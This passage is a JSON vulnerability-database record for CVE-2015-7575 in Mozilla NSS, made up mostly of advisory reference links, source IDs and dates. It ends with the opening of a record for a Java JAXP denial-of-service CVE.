"trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00038.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2016/dsa-3437" }, { "trust": 1.1, "url": "http://www.debian.org/security/2016/dsa-3458" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2016-01/msg00005.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00044.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00139.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00042.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2016-01/msg00058.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00048.html" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2863-1" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2866-1" }, { "trust": 1.1, "url": "http://www.debian.org/security/2016/dsa-3436" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1034541" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2864-1" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00045.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00043.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00041.html" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2865-1" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00047.html" }, { "trust": 1.1, "url": "https://security.gentoo.org/glsa/201706-18" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1036467" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2016/dsa-3688" }, { "trust": 1.1, "url": "https://security.netapp.com/advisory/ntap-20160225-0001/" }, { "trust": 1.1, "url": "https://security.gentoo.org/glsa/201801-15" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7575" }, { "trust": 0.3, "url": "http://www.mozilla.com/en-us/" }, { "trust": 0.3, "url": "http://www.mozilla.org/projects/security/pki/nss/" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/nettcp_advisory2.asc" }, { "trust": 0.3, "url": "https://kb.netapp.com/support/index?page=content\u0026id=9010065\u0026actp=rss" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=nas8n1021096" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=nas8n1021133" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974599" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974776" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974922" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21975233" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975893" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975980" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21976006" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976117" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976169" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21976265" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21976339" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21976527" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976852" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976867" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976868" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976926" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977005" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21977045" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977047" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21977054" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977135" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21977202" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977225" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21977244" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/java_jan2016_advisory.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023250" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023284" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023292" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023364" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023378" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023408" }, { "trust": 0.3, "url": "https://www.mozilla.org/en-us/security/advisories/mfsa2015-150/" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099195" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099200" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099203" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099210" }, { "trust": 0.3, "url": " https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099293" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2016-0012.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982337" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory16.asc" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2016-0007.html" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2016-0008.html" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21979528" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099196" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976573" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978310" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980379" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974637" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099390" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21979761" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005583" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005584" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005585" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005588" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005673" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005690" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005722" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005735" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21972468" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21972469" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974192" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974194" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974473" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974643" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974808" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974877" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974888" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974958" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974965" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975410" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975424" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975573" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975785" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975820" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975823" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975832" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975835" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975877" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975929" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975930" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976042" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976080" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976113" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976217" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976276" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976341" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976362" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976366" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976442" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976476" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976483" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976545" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976553" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976569" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976631" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976678" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976733" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976763" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976765" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976768" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976779" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976813" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976840" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976842" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976844" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976845" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976854" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976855" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976869" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976886" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976888" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976894" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976896" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976925" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976947" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976957" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977021" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977127" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977129 " }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977347" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977407" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977517" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977518" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977523" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977575" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977618" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977646" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977647" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977664" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977838" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977880" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978008" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978026" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978188" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21979194" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21979412" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21979757" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980965" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21981333" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21981540" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982445" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982446" }, { "trust": 0.3, "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21984483" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099197 " }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-0448" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0448" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0466" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-7575" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-0483" }, { "trust": 0.3, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.3, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0483" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-0402" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0494" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-0466" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0402" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-0494" }, { "trust": 0.2, "url": "http://www.mitls.org/pages/attacks/sloth" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8472" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-8126" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8126" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-8472" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-4871" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4871" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/19.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2016:0007" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2863-1/" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=42929" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-8635" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4000" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4000" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2721" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-9074" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9074" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7575" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-5285" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2721" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-8635" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1938" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1938" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5285" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0475" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html#appendixjava" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0475" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-7/7u95-2.6.4-0ubuntu0.15.04.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-7/7u95-2.6.4-0ubuntu0.14.04.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-7/7u95-2.6.4-0ubuntu0.15.10.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4883" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3422" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4882" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4903" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4872" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4844" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4806" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3449" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0363" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0264" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4860" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4893" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0376" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4803" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0376" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4734" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4860" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4842" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4843" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4835" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4903" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4805" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4902" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4883" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4810" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4805" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4893" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5041" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3443" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0363" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4882" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4842" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4843" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-8540" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4835" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-7981" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4810" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4902" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8540" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4872" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0686" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3426" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4734" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4803" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4806" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4844" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-5006" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-5041" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3427" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5006" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0687" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7981" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0264" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/thunderbird/1:38.6.0+build1-0ubuntu0.15.10.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/thunderbird/1:38.6.0+build1-0ubuntu0.14.04.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1523" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1935" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1930" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/thunderbird/1:38.6.0+build1-0ubuntu0.12.04.1" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7575" }, { "db": "BID", "id": "79684" }, { "db": "PACKETSTORM", "id": "140618" }, { "db": "PACKETSTORM", "id": "135212" }, { "db": "PACKETSTORM", "id": "135339" }, { "db": "PACKETSTORM", "id": "135542" }, { "db": "PACKETSTORM", "id": "135340" }, { "db": "PACKETSTORM", "id": "137932" }, { "db": "PACKETSTORM", "id": "136114" }, { "db": "NVD", "id": "CVE-2015-7575" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2015-7575" }, { "db": "BID", "id": "79684" }, { "db": "PACKETSTORM", "id": "140618" }, { "db": "PACKETSTORM", "id": "135212" }, { "db": "PACKETSTORM", "id": "135339" }, { "db": "PACKETSTORM", "id": "135542" }, { "db": "PACKETSTORM", "id": "135340" }, { "db": "PACKETSTORM", "id": "137932" }, { "db": "PACKETSTORM", "id": "136114" }, { "db": "NVD", "id": "CVE-2015-7575" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-09T00:00:00", "db": "VULMON", "id": "CVE-2015-7575" }, { "date": "2015-12-22T00:00:00", "db": "BID", "id": "79684" }, { "date": "2017-01-20T01:24:46", "db": "PACKETSTORM", "id": "140618" }, { "date": "2016-01-11T16:58:47", "db": "PACKETSTORM", "id": "135212" }, { "date": "2016-01-21T14:47:36", "db": "PACKETSTORM", "id": "135339" }, { "date": "2016-02-02T01:59:06", "db": "PACKETSTORM", "id": "135542" }, { "date": "2016-01-21T14:47:43", "db": "PACKETSTORM", "id": "135340" }, { "date": "2016-07-18T19:51:43", "db": "PACKETSTORM", "id": "137932" }, { "date": "2016-03-08T10:13:00", "db": "PACKETSTORM", "id": "136114" }, { "date": "2016-01-09T02:59:10.910000", "db": "NVD", "id": "CVE-2015-7575" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-10-30T00:00:00", "db": "VULMON", "id": "CVE-2015-7575" }, { "date": "2016-10-26T02:01:00", "db": "BID", "id": "79684" }, { "date": "2018-10-30T16:27:35.843000", "db": "NVD", "id": "CVE-2015-7575" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "79684" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Mozilla Network Security Services CVE-2015-7575 Security Bypass Vulnerability", "sources": [ { "db": "BID", "id": "79684" } ], "trust": 0.3 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Failure to Handle Exceptional Conditions", "sources": [ { "db": "BID", "id": "79684" } ], "trust": 0.3 } }
var-201510-0529
Vulnerability from variot
Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60; Java SE Embedded 8u51; and JRockit R28.3.7 allows remote attackers to affect availability via vectors related to JAXP, a different vulnerability than CVE-2015-4803 and CVE-2015-4911. This vulnerability CVE-2015-4803 and CVE-2015-4911 Is a different vulnerability.Service disruption by a third party (DoS) An attack may be carried out. The vulnerability can be exploited over multiple protocols. This issue affects the 'JAXP' sub-component. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
